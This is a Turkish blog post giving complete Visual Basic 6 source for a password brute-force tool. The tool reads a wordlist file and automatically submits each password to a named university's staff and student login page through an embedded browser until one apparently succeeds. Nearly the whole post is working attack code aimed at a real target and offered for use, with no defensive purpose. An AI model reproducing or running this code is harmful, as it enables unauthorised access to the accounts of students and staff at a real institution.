Başlangıç > Kodlar > Visual Basic ile bruteforce programı yapmak

Visual Basic ile bruteforce programı yapmak

Wordlist için, programın çalıştığı klasörde sifreler.txt dosyası oluşturun

Form1.frm dosyası:

VERSION 5.00
Object = "{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}#1.1#0"; "ieframe.dll"
Begin VB.Form Form1 
  BorderStyle   =  1 'Fixed Single
  Caption     =  "Öğrenci Girişi Bruteforce "
  ClientHeight  =  4500
  ClientLeft   =  45
  ClientTop    =  375
  ClientWidth   =  7530
  LinkTopic    =  "Form1"
  MaxButton    =  0  'False
  ScaleHeight   =  4500
  ScaleWidth   =  7530
  StartUpPosition =  3 'Windows Default
  Begin VB.CommandButton Command1 
   Caption     =  "Başla"
   Height     =  375
   Left      =  600
   TabIndex    =  3
   Top       =  2880
   Width      =  1695
  End
  Begin VB.TextBox kullaniciAdi 
   Height     =  285
   Left      =  600
   TabIndex    =  2
   Text      =  "1234567890"
   Top       =  480
   Width      =  1575
  End
  Begin VB.ListBox sifreler 
   Height     =  2010
   Left      =  600
   TabIndex    =  1
   Top       =  840
   Width      =  1575
  End
  Begin VB.Timer Timer1 
   Enabled     =  0  'False
   Interval    =  5000
   Left      =  120
   Top       =  3120
  End
  Begin SHDocVwCtl.WebBrowser WebBrowser1 
   Height     =  3855
   Left      =  4920
   TabIndex    =  0
   Top       =  960
   Width      =  3975
   ExtentX     =  7011
   ExtentY     =  6800
   ViewMode    =  0
   Offline     =  0
   Silent     =  0
   RegisterAsBrowser=  0
   RegisterAsDropTarget=  1
   AutoArrange   =  0  'False
   NoClientEdge  =  0  'False
   AlignLeft    =  0  'False
   NoWebView    =  0  'False
   HideFileNames  =  0  'False
   SingleClick   =  0  'False
   SingleSelection =  0  'False
   NoFolders    =  0  'False
   Transparent   =  0  'False
   ViewID     =  "{0057D0E0-3573-11CF-AE69-08002B2E1262}"
   Location    =  "http:///"
  End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'tahribat.com & tdsoftware.tr.cx
Dim DenenenSifre

Private Sub Command1_Click()
Timer1.Enabled = True
End Sub

Private Sub Form_Load()
Dim degisken As String
Open App.Path & "\sifreler.txt" For Input As #1
Do While Not EOF(1)
Input #1, wordlistsifreler
sifreler.AddItem wordlistsifreler
Loop
Close #1
WebBrowser1.Navigate "http://otomasyon.adiyaman.edu.tr/obys/Hoca/"
End Sub

Private Sub Timer1_Timer()
If WebBrowser1.LocationURL = "http://otomasyon.adiyaman.edu.tr/obys/Hoca/Default.asp?cat=login" Then 'Denemek için sayfa hazır
If sifreler.ListCount = DenenenSifre Then
Timer1.Enabled = False
MsgBox "İşlem tamamlandı", vbInformation
Else
BosluklariDoldurveGir
DenenenSifre = DenenenSifre + 1
Me.Caption = "Öğrenci Girişi Bruteforce (" & DenenenSifre & "/" & sifreler.ListCount & ")"
End If

ElseIf WebBrowser1.LocationURL = "http://otomasyon.adiyaman.edu.tr/obys/Hoca/" Then 'Deniyor
If sifreler.ListCount = DenenenSifre Then
Timer1.Enabled = False
MsgBox "İşlem tamamlandı", vbInformation
Else
BosluklariDoldurveGir
DenenenSifre = DenenenSifre + 1
Me.Caption = "Öğrenci Girişi Bruteforce (" & DenenenSifre & "/" & sifreler.ListCount & ")"
End If

ElseIf WebBrowser1.LocationURL = "http://otomasyon.adiyaman.edu.tr/obys/Hoca/Default.asp?cat=logincontrol" Then 'Deniyor

ElseIf WebBrowser1.LocationURL = "" Then 'Doğruymuş

Else
MsgBox "Şifresi:" & sifreler.List(DenenenSifre), vbOKOnly
End If
End Sub

Sub BosluklariDoldurveGir()
WebBrowser1.Document.All.Item("username").Value = kullaniciAdi.Text
wait 50
WebBrowser1.Document.All.Item("password").Value = sifreler.List(DenenenSifre)
wait 200
WebBrowser1.Document.All.Item("B1").Click
End Sub
Module1.pas dosyası:
Attribute VB_Name = "Module1" Public Declare Function GetTickCount Lib "kernel32" () As Long Public Sub wait(ByVal dblMilliseconds As Double) Dim dblStart As Double Dim dblEnd As Double Dim dblTickCount As Double dblTickCount = GetTickCount() dblStart = GetTickCount() dblEnd = GetTickCount + dblMilliseconds Do DoEvents dblTickCount = GetTickCount() Loop Until dblTickCount > dblEnd Or dblTickCount < dblStart End Sub
Reklamlar
 1. Avatar
  04/03/2012, 21:33

  Iyide 1 film yada Video Olsaydi Resimde olur onu yerlesdirin mende biraz anlayayim… Teshekkurler

  Beğen

 1. No trackbacks yet.

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Connecting to %s

%d blogcu bunu beğendi: